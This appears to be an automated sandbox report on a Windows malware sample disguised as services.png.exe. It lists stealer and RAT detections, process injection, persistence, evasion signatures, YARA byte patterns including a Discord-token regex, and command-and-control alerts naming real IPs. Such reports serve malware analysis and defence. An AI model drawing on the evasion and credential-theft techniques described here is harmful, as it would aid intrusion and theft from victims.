Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
services.png.exe

Overview

General Information

Sample name:services.png.exe
Analysis ID:1603732
MD5:d397a1de162f332782fe3205a07792dd
SHA1:44793b3a374c3cb453bbd87a2fd28d8a4c408002
SHA256:ea251bf7fcc0a42cb9e954a45d925ef379ef1ffca39e482f44af701b4ace8560
Tags:exeuser-juroots
Infos:

Detection

AsyncRAT, Atmos, Citadel, Hancitor, StormKitty, WorldWind Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected Atmos Banker
Yara detected Citadel
Yara detected Hancitor
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected WorldWind Stealer
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Creates a thread in another existing process (thread injection)
Disables Internet Explorer cookie cleaning (a user can no longer delete cookies)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Internet Explorer zone settings
Modifies the prolog of user mode functions (user mode inline hooks)
Monitors registry run keys for changes
Overwrites Windows DLL code with PUSH RET codes
Overwrites code with function prologues
Queries Google from non browser process on port 80
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Renames NTDLL to bypass HIPS
Self deletion via cmd or bat file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses an obfuscated file name to hide its real file extension (double extension)
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes Internet Explorer cookies via registry
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • services.png.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\services.png.exe" MD5: D397A1DE162F332782FE3205A07792DD)
    • nyheukpo.exe (PID: 1460 cmdline: "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe" MD5: 473AD0AE876C0AF9537D6024B36DC538)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3832 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
      • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
      • svchost.exe (PID: 1856 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dllhost.exe (PID: 6064 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • backgroundTaskHost.exe (PID: 4884 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • RuntimeBroker.exe (PID: 2056 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 6120 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • XRdxSzSUL8yOL.exe (PID: 5012 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 4908 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\TOxmmzl2Y.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 3804 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\vfhGgPZc.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 4176 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\vWyNw5R3yLgiPzvoddg.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 4080 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\qKutqjJlu1qqWCF2Kuohxe8.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 2996 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\JNG18ZhoYOsu.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 1720 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\VlKnpZ4GB6as59.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 2008 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XSnEnFYbz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 2496 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\06fPMOvvheMyY666O.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 4456 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\kTHroMrW0Jy5hVZBjz.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 5608 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\GMl8ex5IGBINFDUC0pDJ7G.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • XRdxSzSUL8yOL.exe (PID: 5728 cmdline: "C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\5cJeh7R0c9tyMCIlvC.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Atmosphere
  • Silence group
https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere
NameDescriptionAttributionBlogpost URLsLink
CitadelNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.citadel
NameDescriptionAttributionBlogpost URLsLink
HancitorHancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
No configs have been found
SourceRuleDescriptionAuthorStrings
services.png.exeAtmos_Packed_MalwareSecond Generic Spyware.Citadel.Atmos signture when builder add a packed layerxylitol@temari.fr
  • 0x0:$MZ: 4D 5A
  • 0x13739:$MZ: 4D 5A
  • 0x14cc7:$MZ: 4D 5A
  • 0x3f208:$MZ: 4D 5A
  • 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00
  • 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3
  • 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65
  • 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00
  • 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
    dump.pcapINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
    • 0x1f1b4c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
    sslproxydump.pcapJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeAtmos_Packed_MalwareSecond Generic Spyware.Citadel.Atmos signture when builder add a packed layerxylitol@temari.fr
      • 0x0:$MZ: 4D 5A
      • 0x13739:$MZ: 4D 5A
      • 0x14cc7:$MZ: 4D 5A
      • 0x3f208:$MZ: 4D 5A
      • 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00
      • 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3
      • 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65
      • 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00
      • 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
      C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeJoeSecurity_WorldWindStealerYara detected WorldWind StealerJoe Security
        C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
          C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
              Click to see the 24 entries
              SourceRuleDescriptionAuthorStrings
              00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_CitadelYara detected CitadelJoe Security
                00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_AtmosYara detected Atmos BankerJoe Security
                  00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmpAtmos_MalwareGeneric Spyware.Citadel.Atmos Signaturexylitol@temari.fr
                  • 0x0:$MZ: 4D 5A
                  • 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4
                  • 0x5ff8:$TS1: X-TS-Rule-Name: %s
                  • 0x6020:$TS2: X-TS-Rule-PatternID: %u
                  • 0x6050:$TS3: X-TS-BotID: %s
                  • 0x6070:$TS4: X-TS-Domain: %s
                  • 0x6090:$TS5: X-TS-SessionID: %s
                  • 0x6158:$TS6: X-TS-Header-Cookie: %S
                  • 0x6188:$TS7: X-TS-Header-Referer: %S
                  • 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S
                  • 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S
                  • 0x6238:$TS10: X-TS-Header-UserAgent: %S
                  • 0x5ee0:$VNC1: _hvnc_init@4
                  • 0x5ef0:$VNC2: _hvnc_uninit@0
                  • 0x5f00:$VNC3: _hvnc_start@8
                  • 0x5f10:$VNC4: _hvnc_stop@0
                  • 0x5f20:$VNC5: _hvnc_wait@0
                  • 0x5f30:$VNC6: _hvnc_work@0
                  • 0x8afc:$WB1: nspr4.dll
                  • 0x9ae0:$WB2: nss3.dll
                  • 0x9af4:$WB3: chrome.dll
                  00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmpAtmos_Packed_MalwareSecond Generic Spyware.Citadel.Atmos signture when builder add a packed layerxylitol@temari.fr
                  • 0x0:$MZ: 4D 5A
                  • 0x12e7f:$MZ: 4D 5A
                  • 0x12fc7:$MZ: 4D 5A
                  • 0x15fbd:$MZ: 4D 5A
                  • 0x20234:$MZ: 4D 5A
                  • 0x20274:$MZ: 4D 5A
                  • 0x40808:$MZ: 4D 5A
                  • 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 B5 00 57 33 DB BF 00 28 00 00
                  • 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 B5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3
                  • 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65
                  • 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00
                  • 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 B5 00
                  00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmpcitadel13xyCitadel 1.5.x.y trojan bankerJean-Philippe Teissier / @Jipe_
                  • 0x9d48:$c: %BOTID%
                  • 0x9d50:$d: %BOTNET%
                  • 0x9e64:$f: bc_remove
                  • 0x9e70:$g: bc_add
                  • 0x8b68:$ggurl: http://www.google.com/webhp
                  Click to see the 414 entries
                  SourceRuleDescriptionAuthorStrings
                  41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpackJoeSecurity_CitadelYara detected CitadelJoe Security
                    41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpackJoeSecurity_AtmosYara detected Atmos BankerJoe Security
                      41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpackAtmos_MalwareGeneric Spyware.Citadel.Atmos Signaturexylitol@temari.fr
                      • 0x0:$MZ: 4D 5A
                      • 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4
                      • 0x5ff8:$TS1: X-TS-Rule-Name: %s
                      • 0x6020:$TS2: X-TS-Rule-PatternID: %u
                      • 0x6050:$TS3: X-TS-BotID: %s
                      • 0x6070:$TS4: X-TS-Domain: %s
                      • 0x6090:$TS5: X-TS-SessionID: %s
                      • 0x6158:$TS6: X-TS-Header-Cookie: %S
                      • 0x6188:$TS7: X-TS-Header-Referer: %S
                      • 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S
                      • 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S
                      • 0x6238:$TS10: X-TS-Header-UserAgent: %S
                      • 0x5ee0:$VNC1: _hvnc_init@4
                      • 0x5ef0:$VNC2: _hvnc_uninit@0
                      • 0x5f00:$VNC3: _hvnc_start@8
                      • 0x5f10:$VNC4: _hvnc_stop@0
                      • 0x5f20:$VNC5: _hvnc_wait@0
                      • 0x5f30:$VNC6: _hvnc_work@0
                      • 0x8afc:$WB1: nspr4.dll
                      • 0x9ae0:$WB2: nss3.dll
                      • 0x9af4:$WB3: chrome.dll
                      41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpackcitadel13xyCitadel 1.5.x.y trojan bankerJean-Philippe Teissier / @Jipe_
                      • 0x9d48:$c: %BOTID%
                      • 0x9d50:$d: %BOTNET%
                      • 0x9e64:$f: bc_remove
                      • 0x9e70:$g: bc_add
                      • 0x8b68:$ggurl: http://www.google.com/webhp
                      39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpackJoeSecurity_CitadelYara detected CitadelJoe Security
                        Click to see the 706 entries

                        System Summary

                        barindex
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, ProcessId: 1460, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qicoizh
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe", ParentImage: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, ParentProcessId: 1460, ParentProcessName: nyheukpo.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe
                        Source: Registry Key setAuthor: frack113: Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe, ProcessId: 5012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1406
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe", ParentImage: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe, ParentProcessId: 1460, ParentProcessName: nyheukpo.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:01:49.319383+010020168581A Network Trojan was detected192.168.2.449739212.224.93.93443TCP
                        2025-01-31T11:01:51.736639+010020168581A Network Trojan was detected192.168.2.449741212.224.93.93443TCP
                        2025-01-31T11:01:52.834672+010020168581A Network Trojan was detected192.168.2.449742212.224.93.93443TCP
                        2025-01-31T11:02:19.944736+010020168581A Network Trojan was detected192.168.2.449881212.224.93.93443TCP
                        2025-01-31T11:02:20.801265+010020168581A Network Trojan was detected192.168.2.449886212.224.93.93443TCP
                        2025-01-31T11:02:23.022353+010020168581A Network Trojan was detected192.168.2.449905212.224.93.93443TCP
                        2025-01-31T11:02:32.192129+010020168581A Network Trojan was detected192.168.2.449958212.224.93.93443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:01:49.319383+010020161722Potentially Bad Traffic192.168.2.449739212.224.93.93443TCP
                        2025-01-31T11:01:51.736639+010020161722Potentially Bad Traffic192.168.2.449741212.224.93.93443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:20.801265+010020161732Potentially Bad Traffic192.168.2.449886212.224.93.93443TCP
                        2025-01-31T11:02:32.192129+010020161732Potentially Bad Traffic192.168.2.449958212.224.93.93443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:01:49.319395+010020167421Malware Command and Control Activity Detected212.224.93.93443192.168.2.449739TCP
                        2025-01-31T11:01:49.409332+010020167421Malware Command and Control Activity Detected212.224.93.93443192.168.2.449740TCP
                        2025-01-31T11:01:51.736651+010020167421Malware Command and Control Activity Detected212.224.93.93443192.168.2.449741TCP
                        2025-01-31T11:01:52.834683+010020167421Malware Command and Control Activity Detected212.224.93.93443192.168.2.449742TCP
                        2025-01-31T11:01:54.296192+010020167421Malware Command and Control Activity Detected212.224.93.93443192.168.2.449743TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:35.433109+010020310091Malware Command and Control Activity Detected192.168.2.449981149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:18.643397+010020179301A Network Trojan was detected192.168.2.449873212.224.93.93443TCP
                        2025-01-31T11:02:19.664939+010020179301A Network Trojan was detected192.168.2.449881212.224.93.93443TCP
                        2025-01-31T11:02:20.524811+010020179301A Network Trojan was detected192.168.2.449886212.224.93.93443TCP
                        2025-01-31T11:02:20.603441+010020179301A Network Trojan was detected192.168.2.449890212.224.93.93443TCP
                        2025-01-31T11:02:21.518830+010020179301A Network Trojan was detected192.168.2.449898212.224.93.93443TCP
                        2025-01-31T11:02:22.779059+010020179301A Network Trojan was detected192.168.2.449905212.224.93.93443TCP
                        2025-01-31T11:02:29.915588+010020179301A Network Trojan was detected192.168.2.449946212.224.93.93443TCP
                        2025-01-31T11:02:31.917477+010020179301A Network Trojan was detected192.168.2.449958212.224.93.93443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:31.078684+010020010463Misc activity51.21.41.1655555192.168.2.449952TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:35.433109+010020447661A Network Trojan was detected192.168.2.449981149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:39.955560+010020445571A Network Trojan was detected192.168.2.450010149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:01:49.090214+010020191411Malware Command and Control Activity Detected192.168.2.449739212.224.93.93443TCP
                        2025-01-31T11:01:49.090282+010020191411Malware Command and Control Activity Detected192.168.2.449740212.224.93.93443TCP
                        2025-01-31T11:01:50.577838+010020191411Malware Command and Control Activity Detected192.168.2.449741212.224.93.93443TCP
                        2025-01-31T11:01:52.558427+010020191411Malware Command and Control Activity Detected192.168.2.449742212.224.93.93443TCP
                        2025-01-31T11:01:54.024736+010020191411Malware Command and Control Activity Detected192.168.2.449743212.224.93.93443TCP
                        2025-01-31T11:02:18.643397+010020191411Malware Command and Control Activity Detected192.168.2.449873212.224.93.93443TCP
                        2025-01-31T11:02:19.664939+010020191411Malware Command and Control Activity Detected192.168.2.449881212.224.93.93443TCP
                        2025-01-31T11:02:20.524811+010020191411Malware Command and Control Activity Detected192.168.2.449886212.224.93.93443TCP
                        2025-01-31T11:02:20.603441+010020191411Malware Command and Control Activity Detected192.168.2.449890212.224.93.93443TCP
                        2025-01-31T11:02:21.518830+010020191411Malware Command and Control Activity Detected192.168.2.449898212.224.93.93443TCP
